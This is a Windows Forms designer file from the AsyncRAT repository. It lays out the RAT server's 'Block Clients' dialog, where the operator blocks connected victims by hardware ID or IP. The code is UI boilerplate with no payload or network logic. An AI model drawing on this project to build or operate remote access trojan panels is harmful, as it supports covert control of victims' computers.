AsyncRAT-C-Sharp/AsyncRAT-C#/Server/Forms/FormBlockClients.Designer.cs
NYAN CAT 203dda7369 update
added block client
2019-10-07 20:33:06 +03:00

128 lines
5.6 KiB
C#

namespace Server.Forms
{
partial class FormBlockClients
{
/// <summary>
/// Required designer variable.
/// </summary>
private System.ComponentModel.IContainer components = null;
/// <summary>
/// Clean up any resources being used.
/// </summary>
/// <param name="disposing">true if managed resources should be disposed; otherwise, false.</param>
protected override void Dispose(bool disposing)
{
if (disposing && (components != null))
{
components.Dispose();
}
base.Dispose(disposing);
}
#region Windows Form Designer generated code
/// <summary>
/// Required method for Designer support - do not modify
/// the contents of this method with the code editor.
/// </summary>
private void InitializeComponent()
{
System.ComponentModel.ComponentResourceManager resources = new System.ComponentModel.ComponentResourceManager(typeof(FormBlockClients));
this.groupBox1 = new System.Windows.Forms.GroupBox();
this.listBlocked = new System.Windows.Forms.ListBox();
this.btnDelete = new System.Windows.Forms.Button();
this.btnAdd = new System.Windows.Forms.Button();
this.label1 = new System.Windows.Forms.Label();
this.txtBlock = new System.Windows.Forms.TextBox();
this.groupBox1.SuspendLayout();
this.SuspendLayout();
//
// groupBox1
//
this.groupBox1.Controls.Add(this.listBlocked);
this.groupBox1.Controls.Add(this.btnDelete);
this.groupBox1.Controls.Add(this.btnAdd);
this.groupBox1.Controls.Add(this.label1);
this.groupBox1.Controls.Add(this.txtBlock);
this.groupBox1.Location = new System.Drawing.Point(12, 12);
this.groupBox1.Name = "groupBox1";
this.groupBox1.Size = new System.Drawing.Size(424, 355);
this.groupBox1.TabIndex = 4;
this.groupBox1.TabStop = false;
this.groupBox1.Text = "Block By HWID or IP";
//
// listBlocked
//
this.listBlocked.DataBindings.Add(new System.Windows.Forms.Binding("Name", global::Server.Properties.Settings.Default, "txtBlocked", true, System.Windows.Forms.DataSourceUpdateMode.OnPropertyChanged));
this.listBlocked.FormattingEnabled = true;
this.listBlocked.ItemHeight = 20;
this.listBlocked.Location = new System.Drawing.Point(6, 165);
this.listBlocked.Name = global::Server.Properties.Settings.Default.txtBlocked;
this.listBlocked.SelectionMode = System.Windows.Forms.SelectionMode.MultiSimple;
this.listBlocked.Size = new System.Drawing.Size(290, 184);
this.listBlocked.TabIndex = 4;
//
// btnDelete
//
this.btnDelete.Location = new System.Drawing.Point(352, 165);
this.btnDelete.Name = "btnDelete";
this.btnDelete.Size = new System.Drawing.Size(57, 23);
this.btnDelete.TabIndex = 3;
this.btnDelete.Text = "-";
this.btnDelete.UseVisualStyleBackColor = true;
this.btnDelete.Click += new System.EventHandler(this.BtnDelete_Click);
//
// btnAdd
//
this.btnAdd.Location = new System.Drawing.Point(352, 86);
this.btnAdd.Name = "btnAdd";
this.btnAdd.Size = new System.Drawing.Size(57, 23);
this.btnAdd.TabIndex = 2;
this.btnAdd.Text = "+";
this.btnAdd.UseVisualStyleBackColor = true;
this.btnAdd.Click += new System.EventHandler(this.BtnAdd_Click);
//
// label1
//
this.label1.AutoSize = true;
this.label1.Location = new System.Drawing.Point(6, 51);
this.label1.Name = "label1";
this.label1.Size = new System.Drawing.Size(135, 20);
this.label1.TabIndex = 1;
this.label1.Text = "Insert HWID or IP";
//
// txtBlock
//
this.txtBlock.Location = new System.Drawing.Point(10, 87);
this.txtBlock.Name = "txtBlock";
this.txtBlock.Size = new System.Drawing.Size(286, 26);
this.txtBlock.TabIndex = 0;
//
// FormBlockClients
//
this.AutoScaleDimensions = new System.Drawing.SizeF(9F, 20F);
this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;
this.ClientSize = new System.Drawing.Size(448, 379);
this.Controls.Add(this.groupBox1);
this.Icon = ((System.Drawing.Icon)(resources.GetObject("$this.Icon")));
this.Name = "FormBlockClients";
this.StartPosition = System.Windows.Forms.FormStartPosition.CenterParent;
this.Text = "Block Clients | AsyncRAT";
this.FormClosed += new System.Windows.Forms.FormClosedEventHandler(this.FormBlockClients_FormClosed);
this.Load += new System.EventHandler(this.FormBlockClients_Load);
this.groupBox1.ResumeLayout(false);
this.groupBox1.PerformLayout();
this.ResumeLayout(false);
}
#endregion
private System.Windows.Forms.GroupBox groupBox1;
private System.Windows.Forms.ListBox listBlocked;
private System.Windows.Forms.Button btnDelete;
private System.Windows.Forms.Button btnAdd;
private System.Windows.Forms.Label label1;
public System.Windows.Forms.TextBox txtBlock;
}
}